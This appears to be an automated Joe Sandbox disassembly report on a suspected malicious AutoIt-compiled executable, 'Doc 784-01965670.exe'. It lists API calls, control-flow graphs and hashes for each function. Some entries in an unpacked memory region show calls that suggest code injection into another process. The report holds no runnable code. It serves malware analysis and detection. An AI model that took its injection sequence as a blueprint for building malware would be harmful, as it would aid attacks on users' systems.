                                                                                                                                    • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                    • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                    • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00AD1B70,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                    • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                    • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                    • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                    • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                      • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                      • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                      • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                      • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                      • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                      • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                      • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AD1B70,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$PGH
                                                                                                                                    • API String ID: 423443420-3673556320
                                                                                                                                    • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                    • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                    • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                    • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • _fseek.LIBCMT ref: 004525DA
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452618
• __fread_nolock.LIBCMT ref: 00452629
• __fread_nolock.LIBCMT ref: 00452644
• __fread_nolock.LIBCMT ref: 00452661
• _fseek.LIBCMT ref: 0045267D
• _malloc.LIBCMT ref: 00452689
• _malloc.LIBCMT ref: 00452696
• __fread_nolock.LIBCMT ref: 004526A7
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __fread_nolock$_fseek_malloc_wcscpy
• String ID:
• API String ID: 1911931848-0
• Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
• Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 228 40f450-40f45c call 425210 231 40f460-40f478 228->231 231->231 232 40f47a-40f4a8 call 413990 call 410f70 231->232 237 40f4b0-40f4d1 call 4151b0 232->237 240 40f531 237->240 241 40f4d3-40f4da 237->241 242 40f536-40f540 240->242 243 40f4dc-40f4de 241->243 244 40f4fd-40f517 call 41557c 241->244 246 40f4e0-40f4e2 243->246 247 40f51c-40f51f 244->247 248 40f4e6-40f4ed 246->248 247->237 249 40f521-40f52c 248->249 250 40f4ef-40f4f2 248->250 253 40f543-40f54e 249->253 254 40f52e-40f52f 249->254 251 42937a-4293a0 call 41557c call 4151b0 250->251 252 40f4f8-40f4fb 250->252 264 4293a5-4293c3 call 4151d0 251->264 252->244 252->246 256 40f550-40f553 253->256 257 40f555-40f560 253->257 254->250 256->250 259 429372 257->259 260 40f566-40f571 257->260 259->251 262 429361-429367 260->262 263 40f577-40f57a 260->263 262->248 265 42936d 262->265 263->250 264->242 265->259
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __fread_nolock_fseek_strcat
• String ID: AU3!$EA06
• API String ID: 3818483258-2658333250
• Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
• Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 282->283 283->280
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcscpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\Doc 784-01965670.exe
• API String ID: 192938534-2756136957
• Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
• Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
• Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 286 3f94620-3f946ce call 3f92050 289 3f946d5-3f946fb call 3f95530 CreateFileW 286->289 292 3f946fd 289->292 293 3f94702-3f94712 289->293 294 3f9484d-3f94851 292->294 298 3f94719-3f94733 VirtualAlloc 293->298 299 3f94714 293->299 295 3f94893-3f94896 294->295 296 3f94853-3f94857 294->296 300 3f94899-3f948a0 295->300 301 3f94859-3f9485c 296->301 302 3f94863-3f94867 296->302 303 3f9473a-3f94751 ReadFile 298->303 304 3f94735 298->304 299->294 305 3f948a2-3f948ad 300->305 306 3f948f5-3f9490a 300->306 301->302 307 3f94869-3f94873 302->307 308 3f94877-3f9487b 302->308 311 3f94758-3f94798 VirtualAlloc 303->311 312 3f94753 303->312 304->294 313 3f948af 305->313 314 3f948b1-3f948bd 305->314 315 3f9491a-3f94922 306->315 316 3f9490c-3f94917 VirtualFree 306->316 307->308 309 3f9488b 308->309 310 3f9487d-3f94887 308->310 309->295 310->309 317 3f9479a 311->317 318 3f9479f-3f947ba call 3f95780 311->318 312->294 313->306 319 3f948bf-3f948cf 314->319 320 3f948d1-3f948dd 314->320 316->315 317->294 326 3f947c5-3f947cf 318->326 322 3f948f3 319->322 323 3f948ea-3f948f0 320->323 324 3f948df-3f948e8 320->324 322->300 323->322 324->322 327 3f947d1-3f94800 call 3f95780 326->327 328 3f94802-3f94816 call 3f95590 326->328 327->326 333 3f94818 328->333 334 3f9481a-3f9481e 328->334 333->294 336 3f9482a-3f9482e 334->336 337 3f94820-3f94824 CloseHandle 334->337 338 3f9483e-3f94847 336->338 339 3f94830-3f9483b VirtualFree 336->339 337->336 338->289 338->294 339->338
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F946F1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F94917
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction ID: eb135bfe7df7dd0870f4089946778f1abc7655c495d419b5e9b0e22aac50fb3c
• Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction Fuzzy Hash: 3FA12774E00209EBEF14CFA5C994BEEBBB5BF58304F20819AE105BB280D7759A41CF94

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 340 414f10-414f2c 341 414f4f 340->341 342 414f2e-414f31 340->342 343 414f51-414f55 341->343 342->341 344 414f33-414f35 342->344 345 414f37-414f46 call 417f23 344->345 346 414f56-414f5b 344->346 356 414f47-414f4c call 417ebb 345->356 348 414f6a-414f6d 346->348 349 414f5d-414f68 346->349 352 414f7a-414f7c 348->352 353 414f6f-414f77 call 4131f0 348->353 349->348 351 414f8b-414f9e 349->351 354 414fa0-414fa6 351->354 355 414fa8 351->355 352->345 358 414f7e-414f89 352->358 353->352 359 414faf-414fb1 354->359 355->359 356->341 358->345 358->351 362 4150a1-4150a4 359->362 363 414fb7-414fbe 359->363 362->343 365 414fc0-414fc5 363->365 366 415004-415007 363->366 365->366 367 414fc7 365->367 368 415071-415072 call 41e6b1 366->368 369 415009-41500d 366->369 370 415102 367->370 371 414fcd-414fd1 367->371 382 415077-41507b 368->382 373 41500f-415018 369->373 374 41502e-415035 369->374 377 415106-41510f 370->377 380 414fd3 371->380 381 414fd5-414fd8 371->381 375 415023-415028 373->375 376 41501a-415021 373->376 378 415037 374->378 379 415039-41503c 374->379 384 41502a-41502c 375->384 376->384 377->343 378->379 385 415042-41504e call 41453a call 41ed9e 379->385 386 4150d5-4150d9 379->386 380->381 387 4150a9-4150af 381->387 388 414fde-414fff call 41ee9b 381->388 382->377 383 415081-415085 382->383 383->386 389 415087-415096 383->389 384->379 408 415053-415058 385->408 394 4150eb-4150fd call 417f23 386->394 395 4150db-4150e8 call 4131f0 386->395 390 4150b1-4150bd call 4131f0 387->390 391 4150c0-4150d0 call 417f23 387->391 397 415099-41509b 388->397 389->397 390->391 391->356 394->356 395->394 397->362 397->363 409 415114-415118 408->409 410 41505e-415061 408->410 409->377 410->370 411 415067-41506f 410->411 411->397
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
• Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
• Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Control-flow Graph

APIs
• LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _memset.LIBCMT ref: 00401C62
• _wcsncpy.LIBCMT ref: 00401CA1
• _wcscpy.LIBCMT ref: 00401CBD
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
• String ID: Line:
• API String ID: 1620655955-1585850449
• Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
• Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
• Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 445 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
• ShowWindow.USER32(?,00000000), ref: 00410454
• ShowWindow.USER32(?,00000000), ref: 0041045E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
• Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
• Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                    • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

Control-flow Graph (rendered image): function 3f94400-3f9451b, calling 3f92050, 3f942f0, CreateFileW, VirtualAlloc, ReadFile, 3f94330, 3f932f0, 3f94380 and ExitProcess; executed/not-executed node colouring is not reproduced in text.
APIs
  • Part of subcall function 03F942F0: Sleep.KERNELBASE(000001F4), ref: 03F94301
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F94511
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: S7HPVC2RXH9B
• API String ID: 2694422964-3321098165
• Opcode ID: 8288c0d9c08d87133da1f821957407058f5527ac6ef57f073f9f39ab8b08d097
• Instruction ID: 7c1d20e412a6e5b28ea0043ed71389b5d8579bd00842b603623c5349bcb166e7
• Opcode Fuzzy Hash: 8288c0d9c08d87133da1f821957407058f5527ac6ef57f073f9f39ab8b08d097
• Instruction Fuzzy Hash: 01514071D14249EAFF10DBE4C814BEFBB79AF58300F1041A9E609BB2C0DA791B45CBA5

Control-flow Graph (rendered image): function 413a88-413b15, calling 41718c, 418407, 419f6d, 419f9d, 413ade, RtlFreeHeap, 417f23, GetLastError, 417ee1 and 4171d1; executed/not-executed node colouring is not reproduced in text.
APIs
• __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
• ___sbh_find_block.LIBCMT ref: 00413AB1
• ___sbh_free_block.LIBCMT ref: 00413AC0
• RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
• GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
• Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
• Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
APIs
  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
• _strcat.LIBCMT ref: 0040F603
  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
• String ID: HH
• API String ID: 1194219731-2761332787
• Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
• Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
• Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
• Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03F93AAB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F93B41
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F93B63
Memory Dump Source
• Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
• Instruction ID: b4a77a0e33eaf46ec3184ac1fd953500e63d958a6844fa6b8d80e76e39947ef7
• Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
• Instruction Fuzzy Hash: 0E622D34A14218DBEB24DFA4C850BDEB376EF58300F1091AAD10DEB394E7799E85CB59
APIs
• _memset.LIBCMT ref: 0040E202
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
• Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
• Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
• Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
• Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
APIs
• _malloc.LIBCMT ref: 00411734
  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
